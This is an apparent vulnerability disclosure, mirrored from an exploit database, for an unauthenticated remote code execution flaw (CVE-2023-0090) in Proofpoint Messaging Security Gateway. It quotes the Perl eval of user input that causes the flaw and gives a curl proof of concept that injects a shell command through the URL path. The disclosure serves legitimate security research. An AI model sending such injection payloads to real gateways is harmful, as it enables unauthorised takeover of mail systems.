Share
## https://sploitus.com/exploit?id=PACKETSTORM:225273
# About
    
    Security researcher: ly1g3, ly1g3[at]tuta.io
    
    GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
    
    
    Overview: Remote Code Execution - Unauthenticated RCE
    
    CVE: CVE-2023-0090
    
    Timeline:
    * Discovered - ly1g3
    * Reported - ly1g3
    * Fixed - Proofpoint
    
    # Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73 
    Exploits for Proofpoint Messaging Security Gateway
    
    ## Remote Code Execution (RCE)
    With access to the WebServices API unauthenticated RCE with admin privileges can be achieved.
    
    
    ## Technical
    `Webservices.pm` does not sanitize or check user input. No authentication is required to reach the function but API access must be enable in settings to be able to do RCE. `$module` comes directly from user data and is evaluated.
    
    ```perl
    
    my $module = (split(/\//,$uri))[1];
    $module = SERVICE_MODULE_PREFIX() . "::\u$module";
    
    ...
    
    
    eval("require $module");
    ```
    
    
    
    ## POC
    Will create file called `abc` in `/tmp/`. Code run as `pps` user.
    ```bash
    curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"